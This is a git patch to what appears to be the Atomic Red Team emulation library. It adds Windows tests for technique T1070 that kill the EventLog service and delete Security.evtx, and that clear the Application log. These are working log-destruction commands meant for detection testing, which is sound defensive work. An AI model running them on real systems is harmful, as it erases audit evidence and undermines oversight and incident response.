From aa0aca3b2ee7a360c1bd5a8415e4714b87ec76d8 Mon Sep 17 00:00:00 2001
From: Andrew Beers <apbeers@icloud.com>
Date: Mon, 11 Nov 2019 23:37:19 -0800
Subject: [PATCH] T1070 delete system logs using power shell (#642)

* stop eventlog service and delete Security.evtx logs

* add tests

* fix format error

* try 2 fix formatting
---
 atomics/T1070/T1070.yaml | 28 +++++++++++++++++++++++++++-
 1 file changed, 27 insertions(+), 1 deletion(-)

diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml
index 12d6de82..60c3a73e 100644
--- a/atomics/T1070/T1070.yaml
+++ b/atomics/T1070/T1070.yaml
@@ -70,4 +70,30 @@ atomic_tests:
   executor:
     name: bash
     command: |
-      echo 0> #{log_path}
\ No newline at end of file
+      echo 0> #{log_path}
+
+- name: Delete System Logs Using PowerShell
+  description: |
+    Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
+      Stop-Process -Id $eventLogId -Force
+      Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
+    cleanup_command: |
+      Start-Service -Name EventLog
+
+- name: Delete System Logs Using Clear-EventLogId
+  description: |
+    Clear event logs using built-in PowerShell commands
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      Clear-EventLog -logname Application